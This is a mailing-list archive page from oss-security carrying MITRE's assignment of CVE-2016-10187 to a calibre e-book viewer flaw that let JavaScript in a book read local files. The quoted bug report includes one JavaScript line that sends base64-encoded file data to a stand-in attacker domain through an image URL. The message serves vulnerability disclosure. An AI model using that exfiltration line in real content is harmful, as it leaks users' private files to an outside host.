Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <0cab773cce2c4a279f0667a388d3728c@imshyb01.MITRE.ORG>
Date: Tue, 31 Jan 2017 10:19:04 -0500
From: <cve-assign@...re.org>
To: <mpitt@...ian.org>
CC: <cve-assign@...re.org>, <oss-security@...ts.openwall.com>,
	<anarcat@...ian.org>
Subject: Re: Requesting CVE for calibre file disclosure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

> Calibre 2.75 fixed what looks like a local data disclosure vulnerability:
> 
> https://github.com/kovidgoyal/calibre/commit/3a89718664cb8cce0449d1758eee585ed0d0433c
> 
> E-book viewer: Prevent javascript in the book from accessing files on the computer using XMLHttpRequest.

> https://bugs.launchpad.net/calibre/+bug/1651728

>> When attacker change document.write in payload to this:
>> document.write('<img src="http://evildomain.pl/some.jpg?data=' + btoa(data) + '">');
>> could easily read data from server log.

Use CVE-2016-10187.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJYkKkAAAoJEHb/MwWLVhi2VMIQAJR5qTlhg0haVZfpsRXpX8YG
O3JHHe2AW1NfvM8nYnxLK6MKfgBGIIh2oehQr9fG0wvKp0UF5Nmw8suFdiivfUFC
N5KorT7Yb8xVJJzZmksPQ0mna8KAjJj5tw+1tentldFR0qbBnMxT0FiswF0rh815
B5eVflvSH1gu3f9uEHpk3HSHZ0RagMwwA8XGe6h2AigShdQr6VCjP8SMafiu9pSA
mXB+uFRso6bs5moyspW66DsuixeBBgFXn8QjoNhBWLA0Hj+d4Sz6BC0uUXCtPjy6
6eWLZW2LOjiAlymGNgYuXXxDWslEBYe2LCnLntHKPff/JphuwwqdUz5dHHObktII
uOXYrT7/Fyw6GLUtU3OulmqPbi4hOxEC2ERTse4l1RH9L6GpbBKY7Usq6xM9f9gx
zYD+nQOVfR1aI/otMqsw0PaQSXyENId0Yv31+vwZTXk/TZ1dFBByaRCkjEAeTACR
uh++QTFQKe2z91g+57jAQvAeD9hx6pepr3gV1b0QYjXgsDW2as+FDtWrYUVlVqdf
NszEb+Z5sdVwEBFQVWqDudvZvUPnoaGgb7YrQxY85YSjoqrYk50iWArup2OMSxAb
tMiMJjWuUiU17BPL/ih3OAdEJceUuyVjkmT/rTcjLbGHrCRPT+OZHyqDohzaQKbx
k5XtJrNvWNusE+Q69k0e
=tz/j
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.